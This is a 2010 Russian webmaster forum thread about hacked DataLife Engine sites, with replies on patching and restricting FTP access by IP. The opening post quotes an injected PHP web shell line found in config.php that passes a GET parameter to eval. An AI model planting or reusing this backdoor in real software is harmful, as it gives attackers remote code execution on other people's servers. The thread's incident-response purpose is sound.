X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> dle Взлом сайта в config.php
vasyatko
vasyatko
Topic Starter сообщение 26.12.2010, 2:13; Ответить: vasyatko
Сообщение #1


Завсегдатай
*****


Группа: Active User
Сообщений: 871
Регистрация: 2.6.2008
Поблагодарили: 215 раз
Репутация:   49  


два сайта поломали на одном 8.0 версия на другом 8.2.  

Открылась белая страница.

Нашёл в config.php

'lang_123' => "",

'lang_1111111' => """",

'lang_123456' => "{${@eval($_GET[cmd])}}",




config.php изменяем права на файл и ставим заплатки




похожая тема.

http://talk.prowebber.ru/index.php?showtopic=3375


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:14; Ответить: knaipa
Сообщение #2


мошенник
*****

Группа: Banned
Сообщений: 984
Регистрация: 15.6.2010
Поблагодарили: 280 раз
Репутация:   60  


Что нам теперь делать с этой информацией?


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
YuRec
YuRec
сообщение 26.12.2010, 13:20; Ответить: YuRec
Сообщение #3


Владеет миром тот, кто владеет информацией
*****

Группа: Active User
Сообщений: 558
Регистрация: 10.2.2010
Поблагодарили: 136 раз
Репутация:   24  


Вот на офф сайт описано как спастись.
_http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
сообщение 26.12.2010, 13:40; Ответить: casp
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 717
Регистрация: 7.11.2009
Из: 127.0.0.1
Поблагодарили: 158 раз
Репутация:   36  


Тоже самое! Очистил и нифига. Вирус всё равно грузиться. Что делать?
(заплатку поставил)

Сообщение отредактировал casp - 26.12.2010, 13:40
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:43; Ответить: knaipa
Сообщение #5


мошенник
*****

Группа: Banned
Сообщений: 984
Регистрация: 15.6.2010
Поблагодарили: 280 раз
Репутация:   60  


Сменить пароль на фтп
Разрешить в .ftpaccess доступ только со своего айпишника.


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
YuRec
YuRec
сообщение 26.12.2010, 13:47; Ответить: YuRec
Сообщение #6


Владеет миром тот, кто владеет информацией
*****

Группа: Active User
Сообщений: 558
Регистрация: 10.2.2010
Поблагодарили: 136 раз
Репутация:   24  


Посмотри в шаблоне, может там какие-то непонятные скрипты добавили
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 26.12.2010, 13:47; Ответить: ukrseo
Сообщение #7


клоновод
**

Группа: Banned
Сообщений: 56
Регистрация: 29.3.2010
Поблагодарили: 20 раз
Репутация:   2  


На форуме уже тем 20 за неделю о взломах и о том что и где спрятано. Юзайте поиск уважаемый ТС.

Сообщение отредактировал ukrseo - 26.12.2010, 13:48


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 26.12.2010, 13:49; Ответить: install
Сообщение #8


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1377 раз
Репутация:   201  


(knaipa @ 26.12.2010, 14:43) *
Разрешить в .ftpaccess доступ

подробнее можно написать?

у меня ссылка с ундер-клик подгружается, каспер ее блочит, заплатки так же ставил


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
сообщение 26.12.2010, 13:53; Ответить: casp
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 717
Регистрация: 7.11.2009
Из: 127.0.0.1
Поблагодарили: 158 раз
Репутация:   36  


Во, install , у меня тоже самое. Каспер блочит какие то левые сайты под загрузку, права ставил, чистил эти lang_11111 всё равно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:57; Ответить: knaipa
Сообщение #10


мошенник
*****

Группа: Banned
Сообщений: 984
Регистрация: 15.6.2010
Поблагодарили: 280 раз
Репутация:   60  


95% всех взломов из-за того, что злоумышленник смог каким-то способом попасть через ftp на сервер и сделать нужное ему дело
поэтому кроме смены пароля нужно ещё и попробовать ограничить доступ по фтп
вот нагуглил немного

Настроек в этом файле может быть большое множество, однако для защиты, нас интересует только один параметр. Прописав эти строки в файле вы закроете полностью доступ от всех!

<Limit ALL>
Deny from all
</Limit>

После написанного выше, никто не сможет зайти на ФТП. Для добавления разрешения к определенному IP надо добавить строку вида

Allow from 127.0.0.1

перед Deny, например:

<Limit ALL>
Allow from 127.0.0.1
Deny from all
</Limit>

Естественно адрес 127.0.0.1 указан для примера. Нужно указать свой сетевой IP. Если же у вас динамический адрес, можно использовать фильтр вида:


ах да, это обычный текстовый файл, ложите его в корне хостинга.
вместо 127.0.0.1 указываете свой айпишник, узнать его можно к примеру тут http://ripe.net/ (справа вверху)


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Ваши первые действия после создания сайта
представьте что вы создали новый сайт
10 HavingingWorld 383 Сегодня, 0:05
автор: JOHNY
Открытая тема (нет новых ответов) Ссылки с сайта по ремонту квартир
Только Москва
1 serb000 861 Вчера, 14:48
автор: Olopopscalius
Открытая тема (нет новых ответов) 90 статейных ссылок. Хорошие доноры для вашего сайта.
7 blogprogon 456 Вчера, 12:27
автор: blogprogon
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
312 kaartes 112765 Вчера, 12:07
автор: avega
Открытая тема (нет новых ответов) Нужна верстка со знанием php
4 Nemo 340 Вчера, 7:14
автор: Nemo


 



RSS Текстовая версия Сейчас: 23.5.2018, 0:21
Дизайн